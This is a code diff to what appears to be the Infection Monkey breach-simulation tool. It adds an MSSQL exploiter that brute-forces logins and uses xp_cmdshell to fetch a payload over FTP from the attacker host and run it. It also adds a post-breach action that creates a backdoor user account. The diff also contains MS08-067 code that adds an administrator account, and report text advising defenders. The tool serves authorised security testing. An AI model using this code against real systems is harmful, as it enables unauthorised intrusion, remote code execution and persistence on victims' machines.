diff --git a/README.md b/README.md
index a53eb9c5b..6ab6813ce 100644
--- a/README.md
+++ b/README.md
@@ -41,6 +41,8 @@ Setup
-------------------------------
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).
+The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).
+
Building the Monkey from source
-------------------------------
diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py
index 4a63c082b..839a17018 100644
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@@ -7,8 +7,6 @@ from abc import ABCMeta
from itertools import product
import importlib
-importlib.import_module('infection_monkey', 'network')
-
__author__ = 'itamar'
GUID = str(uuid.getnode())
@@ -22,6 +20,7 @@ class Configuration(object):
# now we won't work at <2.7 for sure
network_import = importlib.import_module('infection_monkey.network')
exploit_import = importlib.import_module('infection_monkey.exploit')
+ post_breach_import = importlib.import_module('infection_monkey.post_breach')
unknown_items = []
for key, value in formatted_data.items():
@@ -41,6 +40,9 @@ class Configuration(object):
elif key == 'exploiter_classes':
class_objects = [getattr(exploit_import, val) for val in value]
setattr(self, key, class_objects)
+ elif key == 'post_breach_actions':
+ class_objects = [getattr(post_breach_import, val) for val in value]
+ setattr(self, key, class_objects)
else:
if hasattr(self, key):
setattr(self, key, value)
@@ -193,7 +195,7 @@ class Configuration(object):
9200]
tcp_target_ports.extend(HTTP_PORTS)
tcp_scan_timeout = 3000 # 3000 Milliseconds
- tcp_scan_interval = 200
+ tcp_scan_interval = 0
tcp_scan_get_banner = True
# Ping Scanner
@@ -206,8 +208,8 @@ class Configuration(object):
skip_exploit_if_file_exist = False
ms08_067_exploit_attempts = 5
- ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
- ms08_067_remote_user_pass = "Password1!"
+ user_to_add = "Monkey_IUSER_SUPPORT"
+ remote_user_pass = "Password1!"
# rdp exploiter
rdp_use_vbs_download = True
@@ -268,5 +270,7 @@ class Configuration(object):
extract_azure_creds = True
+ post_breach_actions = []
+
WormConfiguration = Configuration()
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index 0779301d2..22a97a5b1 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -41,7 +41,8 @@
"SambaCryExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
- "HadoopExploiter"
+ "HadoopExploiter",
+ "MSSQLExploiter"
],
"finger_classes": [
"SSHFinger",
@@ -57,8 +58,8 @@
"monkey_log_path_linux": "/tmp/user-1563",
"send_log_to_server": true,
"ms08_067_exploit_attempts": 5,
- "ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
- "ms08_067_remote_user_pass": "Password1!",
+ "user_to_add": "Monkey_IUSER_SUPPORT",
+ "remote_user_pass": "Password1!",
"ping_scan_timeout": 10000,
"rdp_use_vbs_download": true,
"smb_download_timeout": 300,
@@ -79,7 +80,7 @@
"sambacry_shares_not_to_check": ["IPC$", "print$"],
"local_network_scan": false,
"tcp_scan_get_banner": true,
- "tcp_scan_interval": 200,
+ "tcp_scan_interval": 0,
"tcp_scan_timeout": 10000,
"tcp_target_ports": [
22,
@@ -97,5 +98,6 @@
"timeout_between_iterations": 10,
"use_file_logging": true,
"victims_max_exploit": 7,
- "victims_max_find": 30
+ "victims_max_find": 30,
+ "post_breach_actions" : []
}
diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py
index 470155020..9ea2bcc75 100644
--- a/monkey/infection_monkey/exploit/__init__.py
+++ b/monkey/infection_monkey/exploit/__init__.py
@@ -45,3 +45,4 @@ from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
from infection_monkey.exploit.struts2 import Struts2Exploiter
from infection_monkey.exploit.weblogic import WebLogicExploiter
from infection_monkey.exploit.hadoop import HadoopExploiter
+from infection_monkey.exploit.mssqlexec import MSSQLExploiter
diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py
index 9eb64682b..2de001ba3 100644
--- a/monkey/infection_monkey/exploit/elasticgroovy.py
+++ b/monkey/infection_monkey/exploit/elasticgroovy.py
@@ -8,7 +8,7 @@ import json
import logging
import requests
from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
+from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
import re
@@ -34,7 +34,7 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
exploit_config['dropper'] = True
exploit_config['url_extensions'] = ['_search?pretty']
- exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
+ exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX+" "+RDP_CMDLINE_HTTP}
return exploit_config
def get_open_service_ports(self, port_list, names):
@@ -63,3 +63,20 @@ class ElasticGroovyExploiter(WebRCE):
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
except (KeyError, IndexError):
return None
+
+ def check_if_exploitable(self, url):
+ # Overridden web_rce method that adds CMD prefix for windows command
+ try:
+ if 'windows' in self.host.os['type']:
+ resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND)
+ else:
+ resp = self.exploit(url, CHECK_COMMAND)
+ if resp is True:
+ return True
+ elif resp is not False and ID_STRING in resp:
+ return True
+ else:
+ return False
+ except Exception as e:
+ LOG.error("Host's exploitability check failed due to: %s" % e)
+ return False
\ No newline at end of file
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
new file mode 100644
index 000000000..985394a29
--- /dev/null
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -0,0 +1,128 @@
+import os
+import platform
+from os import path
+import logging
+
+import pymssql
+
+from infection_monkey.exploit import HostExploiter, mssqlexec_utils
+
+__author__ = 'Maor Rayzin'
+
+LOG = logging.getLogger(__name__)
+
+
+class MSSQLExploiter(HostExploiter):
+
+ _TARGET_OS_TYPE = ['windows']
+ LOGIN_TIMEOUT = 15
+ SQL_DEFAULT_TCP_PORT = '1433'
+ DEFAULT_PAYLOAD_PATH = os.path.expandvars(r'%TEMP%\~PLD123.bat') if platform.system() else '/tmp/~PLD123.bat'
+
+ def __init__(self, host):
+ super(MSSQLExploiter, self).__init__(host)
+ self._config = __import__('config').WormConfiguration
+ self.attacks_list = [mssqlexec_utils.CmdShellAttack]
+
+ def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH):
+ """
+ This function creates dynamically the payload file to be transported and ran on the exploited machine.
+ :param payload_path: A path to the create the payload file in
+ :return: True if the payload file was created and false otherwise.
+ """
+ try:
+ with open(payload_path, 'w+') as payload_file:
+ payload_file.write('dir C:\\')
+ return True
+ except Exception as e:
+ LOG.error("Payload file couldn't be created", exc_info=True)
+ return False
+
+ def exploit_host(self):
+ """
+ Main function of the mssql brute force
+ Return:
+ True or False depends on process success
+ """
+ username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
+
+ if not self.create_payload_file():
+ return False
+ if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
+ self.DEFAULT_PAYLOAD_PATH):
+ LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))
+ return True
+ else:
+ LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
+ return False
+
+ def handle_payload(self, cursor, payload):
+
+ """
+ Handles the process of payload sending and execution, prepares the attack and details.
+
+ Args:
+ cursor (pymssql.conn.cursor obj): A cursor of a connected pymssql.connect obj to user for commands.
+ payload (string): Payload path
+
+ Return:
+ True or False depends on process success
+ """
+
+ chosen_attack = self.attacks_list[0](payload, cursor, self.host.ip_addr)
+
+ if chosen_attack.send_payload():
+ LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
+ if chosen_attack.execute_payload():
+ LOG.debug('Payload: {0} has been successfully executed on host'.format(payload))
+ chosen_attack.cleanup_files()
+ return True
+ else:
+ LOG.error("Payload: {0} couldn't be executed".format(payload))
+ else:
+ LOG.error("Payload: {0} couldn't be sent to host".format(payload))
+
+ chosen_attack.cleanup_files()
+ return False
+
+ def brute_force_begin(self, host, port, users_passwords_pairs_list, payload):
+ """
+ Starts the brute force connection attempts and if needed then init the payload process.
+ Main loop starts here.
+
+ Args:
+ host (str): Host ip address
+ port (str): Tcp port that the host listens to
+ payload (str): Local path to the payload
+ users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
+
+ Return:
+ True or False depends if the whole bruteforce and attack process was completed successfully or not
+ """
+ # Main loop
+ # Iterates on users list
+ for user, password in users_passwords_pairs_list:
+ try:
+ # Core steps
+ # Trying to connect
+ conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
+ LOG.info('Successfully connected to host: {0}, '
+ 'using user: {1}, password: {2}'.format(host, user, password))
+ self.report_login_attempt(True, user, password)
+ cursor = conn.cursor()
+
+ # Handles the payload and return True or False
+ if self.handle_payload(cursor, payload):
+ LOG.debug("Successfully sent and executed payload: {0} on host: {1}".format(payload, host))
+ return True
+ else:
+ LOG.warning("user: {0} and password: {1}, "
+ "was able to connect to host: {2} but couldn't handle payload: {3}"
+ .format(user, password, host, payload))
+ except pymssql.OperationalError:
+ # Combo didn't work, hopping to the next one
+ pass
+
+ LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
+ 'aborting brute force'.format(host, port))
+ return False
diff --git a/monkey/infection_monkey/exploit/mssqlexec_utils.py b/monkey/infection_monkey/exploit/mssqlexec_utils.py
new file mode 100644
index 000000000..ab8b88e60
--- /dev/null
+++ b/monkey/infection_monkey/exploit/mssqlexec_utils.py
@@ -0,0 +1,214 @@
+import os
+import multiprocessing
+import logging
+
+import pymssql
+
+from infection_monkey.exploit.tools import get_interface_to_target
+from pyftpdlib.authorizers import DummyAuthorizer
+from pyftpdlib.handlers import FTPHandler
+from pyftpdlib.servers import FTPServer
+
+
+__author__ = 'Maor Rayzin'
+
+
+FTP_SERVER_PORT = 1026
+FTP_SERVER_ADDRESS = ''
+FTP_SERVER_USER = 'brute'
+FTP_SERVER_PASSWORD = 'force'
+FTP_WORKING_DIR = '.'
+
+LOG = logging.getLogger(__name__)
+
+
+class FTP(object):
+
+ """Configures and establish an FTP server with default details.
+
+ Args:
+ user (str): User for FTP server auth
+ password (str): Password for FTP server auth
+ working_dir (str): The local working dir to init the ftp server on.
+
+ """
+
+ def __init__(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD,
+ working_dir=FTP_WORKING_DIR):
+ """Look at class level docstring."""
+
+ self.user = user
+ self.password = password
+ self.working_dir = working_dir
+
+ def run_server(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD,
+ working_dir=FTP_WORKING_DIR):
+
+ """ Configures and runs the ftp server to listen forever until stopped.
+
+ Args:
+ user (str): User for FTP server auth
+ password (str): Password for FTP server auth
+ working_dir (str): The local working dir to init the ftp server on.
+ """
+
+ # Defining an authorizer and configuring the ftp user
+ authorizer = DummyAuthorizer()
+ authorizer.add_user(user, password, working_dir, perm='elradfmw')
+
+ # Normal ftp handler
+ handler = FTPHandler
+ handler.authorizer = authorizer
+
+ address = (FTP_SERVER_ADDRESS, FTP_SERVER_PORT)
+
+ # Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
+ self.server = FTPServer(address, handler)
+
+ # Starting ftp server, this server has no auto stop or stop clause, and also, its blocking on use, thats why I
+ # multiproccess is being used here.
+ self.server.serve_forever()
+
+ def stop_server(self):
+ # Stops the FTP server and closing all connections.
+ self.server.close_all()
+
+
+class AttackHost(object):
+ """
+ This class acts as an interface for the attacking methods class
+
+ Args:
+ payload_path (str): The local path of the payload file
+ """
+
+ def __init__(self, payload_path):
+ self.payload_path = payload_path
+
+ def send_payload(self):
+ raise NotImplementedError("Send function not implemented")
+
+ def execute_payload(self):
+ raise NotImplementedError("execute function not implemented")
+
+
+class CmdShellAttack(AttackHost):
+
+ """
+ This class uses the xp_cmdshell command execution and will work only if its available on the remote host.
+
+ Args:
+ payload_path (str): The local path of the payload file
+ cursor (pymssql.conn.obj): A cursor object from pymssql.connect to run commands with.
+
+ """
+
+ def __init__(self, payload_path, cursor, dst_ip_address):
+ super(CmdShellAttack, self).__init__(payload_path)
+ self.ftp_server, self.ftp_server_p = self.__init_ftp_server()
+ self.cursor = cursor
+ self.attacker_ip = get_interface_to_target(dst_ip_address)
+
+ def send_payload(self):
+ """
+ Sets up an FTP server and using it to download the payload to the remote host
+
+ Return:
+ True if payload sent False if not.
+ """
+
+ # Sets up the cmds to run
+ shellcmd1 = """xp_cmdshell "mkdir c:\\tmp& chdir c:\\tmp& echo open {0} {1}>ftp.txt& \
+ echo {2}>>ftp.txt" """.format(self.attacker_ip, FTP_SERVER_PORT, FTP_SERVER_USER)
+ shellcmd2 = """xp_cmdshell "chdir c:\\tmp& echo {0}>>ftp.txt" """.format(FTP_SERVER_PASSWORD)
+
+ shellcmd3 = """xp_cmdshell "chdir c:\\tmp& echo get {0}>>ftp.txt& echo bye>>ftp.txt" """\
+ .format(self.payload_path)
+ shellcmd4 = """xp_cmdshell "chdir c:\\tmp& cmd /c ftp -s:ftp.txt" """
+ shellcmds = [shellcmd1, shellcmd2, shellcmd3, shellcmd4]
+
+ # Checking to see if ftp server is up
+ if self.ftp_server_p and self.ftp_server:
+
+ try:
+ # Running the cmd on remote host
+ for cmd in shellcmds:
+ self.cursor.execute(cmd)
+ except Exception as e:
+ LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
+ self.ftp_server_p.terminate()
+ return False
+ return True
+ else:
+ LOG.error("Couldn't establish an FTP server for the dropout")
+ return False
+
+ def execute_payload(self):
+
+ """
+ Executes the payload after ftp drop
+
+ Return:
+ True if payload was executed successfully, False if not.
+ """
+
+ # Getting the payload's file name
+ payload_file_name = os.path.split(self.payload_path)[1]
+
+ # Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
+ shellcmd = """DECLARE @i INT \
+ EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
+ SELECT @i """.format(payload_file_name)
+
+ try:
+ # Executing payload on remote host
+ LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
+ self.cursor.execute(shellcmd)
+ if self.cursor.fetchall()[0][0] == 0:
+ # Success
+ self.ftp_server_p.terminate()
+ LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
+ return True
+ else:
+ LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
+ self.ftp_server_p.terminate()
+ return False
+
+ except pymssql.OperationalError:
+ LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
+ self.ftp_server_p.terminate()
+ return False
+
+ def cleanup_files(self):
+ """
+ Cleans up the folder with the attack related files (C:\\tmp by default)
+ :return: True or False if command executed or not.
+ """
+ cleanup_command = """xp_cmdshell "rd /s /q c:\\tmp" """
+ try:
+ self.cursor.execute(cleanup_command)
+ LOG.info('Attack files cleanup command has been sent.')
+ return True
+ except Exception as e:
+ LOG.error('Error cleaning the attack files using xp_cmdshell, files may remain on host', exc_info=True)
+ return False
+
+ def __init_ftp_server(self):
+ """
+ Init an FTP server using FTP class on a different process
+
+ Return:
+ ftp_s: FTP server object
+ p: the process obj of the FTP object
+ """
+
+ try:
+ ftp_s = FTP()
+ multiprocessing.log_to_stderr(logging.DEBUG)
+ p = multiprocessing.Process(target=ftp_s.run_server)
+ p.start()
+ LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
+ return ftp_s, p
+ except Exception as e:
+ LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
+ return None, None
diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py
index 9f8837157..41b3820d5 100644
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ b/monkey/infection_monkey/exploit/win_ms08_067.py
@@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
sock.send("cmd /c (net user %s %s /add) &&"
" (net localgroup administrators %s /add)\r\n" %
- (self._config.ms08_067_remote_user_add,
- self._config.ms08_067_remote_user_pass,
- self._config.ms08_067_remote_user_add))
+ (self._config.user_to_add,
+ self._config.remote_user_pass,
+ self._config.user_to_add))
time.sleep(2)
reply = sock.recv(1000)
@@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
remote_full_path = SmbTools.copy_file(self.host,
src_path,
self._config.dropper_target_path_win_32,
- self._config.ms08_067_remote_user_add,
- self._config.ms08_067_remote_user_pass)
+ self._config.user_to_add,
+ self._config.remote_user_pass)
if not remote_full_path:
# try other passwords for administrator
@@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):
try:
sock.send("start %s\r\n" % (cmdline,))
- sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
+ sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
except Exception as exc:
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
return False
diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py
index 35a63f2a2..e6c2e63a5 100644
--- a/monkey/infection_monkey/model/__init__.py
+++ b/monkey/infection_monkey/model/__init__.py
@@ -24,6 +24,8 @@ CHMOD_MONKEY = "chmod +x %(monkey_path)s"
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
# Commands used to check for architecture and if machine is exploitable
CHECK_COMMAND = "echo %s" % ID_STRING
+# CMD prefix for windows commands
+CMD_PREFIX = "cmd.exe /c"
# Architecture checking commands
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
GET_ARCH_LINUX = "lscpu"
diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py
index 30eb57f1c..4d5bdf7dc 100644
--- a/monkey/infection_monkey/monkey.py
+++ b/monkey/infection_monkey/monkey.py
@@ -109,6 +109,10 @@ class InfectionMonkey(object):
system_info = system_info_collector.get_info()
ControlClient.send_telemetry("system_info_collection", system_info)
+ for action_class in WormConfiguration.post_breach_actions:
+ action = action_class()
+ action.act()
+
if 0 == WormConfiguration.depth:
LOG.debug("Reached max depth, shutting down")
ControlClient.send_telemetry("trace", "Reached max depth, shutting down")
diff --git a/monkey/infection_monkey/network/network_scanner.py b/monkey/infection_monkey/network/network_scanner.py
index 2ccdfe74c..8fd8c2b65 100644
--- a/monkey/infection_monkey/network/network_scanner.py
+++ b/monkey/infection_monkey/network/network_scanner.py
@@ -106,8 +106,8 @@ class NetworkScanner(object):
break
- if SCAN_DELAY:
- time.sleep(SCAN_DELAY)
+ if WormConfiguration.tcp_scan_interval:
+ time.sleep(WormConfiguration.tcp_scan_interval)
@staticmethod
def _is_any_ip_in_subnet(ip_addresses, subnet_str):
diff --git a/monkey/infection_monkey/post_breach/__init__.py b/monkey/infection_monkey/post_breach/__init__.py
new file mode 100644
index 000000000..3faa2233e
--- /dev/null
+++ b/monkey/infection_monkey/post_breach/__init__.py
@@ -0,0 +1,4 @@
+__author__ = 'danielg'
+
+
+from add_user import BackdoorUser
\ No newline at end of file
diff --git a/monkey/infection_monkey/post_breach/add_user.py b/monkey/infection_monkey/post_breach/add_user.py
new file mode 100644
index 000000000..b8cb9a027
--- /dev/null
+++ b/monkey/infection_monkey/post_breach/add_user.py
@@ -0,0 +1,49 @@
+import datetime
+import logging
+import subprocess
+import sys
+from infection_monkey.config import WormConfiguration
+
+LOG = logging.getLogger(__name__)
+
+# Linux doesn't have WindowsError
+try:
+ WindowsError
+except NameError:
+ WindowsError = None
+
+__author__ = 'danielg'
+
+
+class BackdoorUser(object):
+ """
+ This module adds a disabled user to the system.
+ This tests part of the ATT&CK matrix
+ """
+
+ def act(self):
+ LOG.info("Adding a user")
+ if sys.platform.startswith("win"):
+ retval = self.add_user_windows()
+ else:
+ retval = self.add_user_linux()
+ if retval != 0:
+ LOG.warn("Failed to add a user")
+ else:
+ LOG.info("Done adding user")
+
+ @staticmethod
+ def add_user_linux():
+ cmd_line = ['useradd', '-M', '--expiredate',
+ datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
+ WormConfiguration.user_to_add]
+ retval = subprocess.call(cmd_line)
+ return retval
+
+ @staticmethod
+ def add_user_windows():
+ cmd_line = ['net', 'user', WormConfiguration.user_to_add,
+ WormConfiguration.remote_user_pass,
+ '/add', '/ACTIVE:NO']
+ retval = subprocess.call(cmd_line)
+ return retval
diff --git a/monkey/infection_monkey/requirements.txt b/monkey/infection_monkey/requirements.txt
index 468b748e8..5b9299c8c 100644
--- a/monkey/infection_monkey/requirements.txt
+++ b/monkey/infection_monkey/requirements.txt
@@ -14,4 +14,7 @@ six
ecdsa
netifaces
ipaddress
-wmi
\ No newline at end of file
+wmi
+pywin32
+pymssql
+pyftpdlib
\ No newline at end of file
diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py
index 1348a6fcb..7c3739a0f 100644
--- a/monkey/infection_monkey/system_info/windows_info_collector.py
+++ b/monkey/infection_monkey/system_info/windows_info_collector.py
@@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
"""
LOG.debug("Running Windows collector")
super(WindowsInfoCollector, self).get_info()
- self.get_wmi_info()
+ #self.get_wmi_info()
self.get_installed_packages()
from infection_monkey.config import WormConfiguration
if WormConfiguration.should_use_mimikatz:
diff --git a/monkey/monkey_island/cc/services/config_schema.py b/monkey/monkey_island/cc/services/config_schema.py
index bb5b10cbb..d1bc68adf 100644
--- a/monkey/monkey_island/cc/services/config_schema.py
+++ b/monkey/monkey_island/cc/services/config_schema.py
@@ -22,6 +22,13 @@ SCHEMA = {
],
"title": "WMI Exploiter"
},
+ {
+ "type": "string",
+ "enum": [
+ "MSSQLExploiter"
+ ],
+ "title": "MSSQL Exploiter"
+ },
{
"type": "string",
"enum": [
@@ -87,6 +94,19 @@ SCHEMA = {
}
]
},
+ "post_breach_acts": {
+ "title": "Post breach actions",
+ "type": "string",
+ "anyOf": [
+ {
+ "type": "string",
+ "enum": [
+ "BackdoorUser"
+ ],
+ "title": "Back door user",
+ },
+ ],
+ },
"finger_classes": {
"title": "Fingerprint class",
"type": "string",
@@ -275,7 +295,19 @@ SCHEMA = {
"type": "boolean",
"default": True,
"description": "Is the monkey alive"
- }
+ },
+ "post_breach_actions": {
+ "title": "Post breach actions",
+ "type": "array",
+ "uniqueItems": True,
+ "items": {
+ "$ref": "#/definitions/post_breach_acts"
+ },
+ "default": [
+ "BackdoorUser",
+ ],
+ "description": "List of actions the Monkey will run post breach"
+ },
}
},
"behaviour": {
@@ -669,6 +701,7 @@ SCHEMA = {
"default": [
"SmbExploiter",
"WmiExploiter",
+ "MSSQLExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
@@ -700,14 +733,14 @@ SCHEMA = {
"default": 5,
"description": "Number of attempts to exploit using MS08_067"
},
- "ms08_067_remote_user_add": {
- "title": "MS08_067 remote user",
+ "user_to_add": {
+ "title": "Remote user",
"type": "string",
"default": "Monkey_IUSER_SUPPORT",
"description": "Username to add on successful exploit"
},
- "ms08_067_remote_user_pass": {
- "title": "MS08_067 remote user password",
+ "remote_user_pass": {
+ "title": "Remote user password",
"type": "string",
"default": "Password1!",
"description": "Password to use for created user"
@@ -841,7 +874,7 @@ SCHEMA = {
"tcp_scan_interval": {
"title": "TCP scan interval",
"type": "integer",
- "default": 200,
+ "default": 0,
"description": "Time to sleep (in milliseconds) between scans"
},
"tcp_scan_timeout": {
diff --git a/monkey/monkey_island/cc/services/report.py b/monkey/monkey_island/cc/services/report.py
index 46a4ee448..8e4d42abd 100644
--- a/monkey/monkey_island/cc/services/report.py
+++ b/monkey/monkey_island/cc/services/report.py
@@ -40,7 +40,8 @@ class ReportService:
'ShellShockExploiter': 'ShellShock Exploiter',
'Struts2Exploiter': 'Struts2 Exploiter',
'WebLogicExploiter': 'Oracle WebLogic Exploiter',
- 'HadoopExploiter': 'Hadoop/Yarn Exploiter'
+ 'HadoopExploiter': 'Hadoop/Yarn Exploiter',
+ 'MSSQLExploiter': 'MSSQL Exploiter'
}
class ISSUES_DICT(Enum):
@@ -55,7 +56,8 @@ class ReportService:
STRUTS2 = 8
WEBLOGIC = 9
HADOOP = 10
- PTH_CRIT_SERVICES_ACCESS = 11
+ PTH_CRIT_SERVICES_ACCESS = 11,
+ MSSQL = 12
class WARNINGS_DICT(Enum):
CROSS_SEGMENT = 0
@@ -329,6 +331,12 @@ class ReportService:
processed_exploit['type'] = 'hadoop'
return processed_exploit
+ @staticmethod
+ def process_mssql_exploit(exploit):
+ processed_exploit = ReportService.process_general_exploit(exploit)
+ processed_exploit['type'] = 'mssql'
+ return processed_exploit
+
@staticmethod
def process_exploit(exploit):
exploiter_type = exploit['data']['exploiter']
@@ -343,7 +351,8 @@ class ReportService:
'ShellShockExploiter': ReportService.process_shellshock_exploit,
'Struts2Exploiter': ReportService.process_struts2_exploit,
'WebLogicExploiter': ReportService.process_weblogic_exploit,
- 'HadoopExploiter': ReportService.process_hadoop_exploit
+ 'HadoopExploiter': ReportService.process_hadoop_exploit,
+ 'MSSQLExploiter': ReportService.process_mssql_exploit
}
return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
@@ -571,6 +580,7 @@ class ReportService:
PTHReportService.get_duplicated_passwords_issues,
PTHReportService.get_strong_users_on_crit_issues
]
+
issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])
issues_dict = {}
@@ -643,6 +653,8 @@ class ReportService:
issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
elif issue['type'] == 'weblogic':
issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
+ elif issue['type'] == 'mssql':
+ issues_byte_array[ReportService.ISSUES_DICT.MSSQL.value] = True
elif issue['type'] == 'hadoop':
issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
index 254d75809..b5ab30581 100644
--- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
+++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
@@ -29,7 +29,8 @@ class ReportPageComponent extends AuthComponent {
STRUTS2: 8,
WEBLOGIC: 9,
HADOOP: 10,
- PTH_CRIT_SERVICES_ACCESS: 11
+ PTH_CRIT_SERVICES_ACCESS: 11,
+ MSSQL: 12
};
Warning =
@@ -341,6 +342,8 @@ class ReportPageComponent extends AuthComponent {
Hadoop/Yarn servers are vulnerable to remote code execution. : null }
{this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
Mimikatz found login credentials of a user who has admin access to a server defined as critical.: null }
+ {this.state.report.overview.issues[this.Issue.MSSQL] ?
+ MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command. : null }
:
@@ -412,7 +415,6 @@ class ReportPageComponent extends AuthComponent {
{this.generateIssues(this.state.report.recommendations.issues)}
-
);
}
@@ -867,7 +869,23 @@ class ReportPageComponent extends AuthComponent {
);
}
-
+generateMSSQLIssue(issue) {
+ return(
+
+ Disable the xp_cmdshell option.
+
+ The machine {issue.machine} ({issue.ip_address}) is vulnerable to a MSSQL exploit attack.
+
+ The attack was made possible because the target machine used an outdated MSSQL server configuration allowing
+ the usage of the xp_cmdshell command. To learn more about how to disable this feature, read
+ Microsoft's documentation.
+
+
+ );
+ }
generateIssue = (issue) => {
let data;
@@ -935,6 +953,9 @@ class ReportPageComponent extends AuthComponent {
case 'hadoop':
data = this.generateHadoopIssue(issue);
break;
+ case 'mssql':
+ data = this.generateMSSQLIssue(issue);
+ break;
}
return data;
};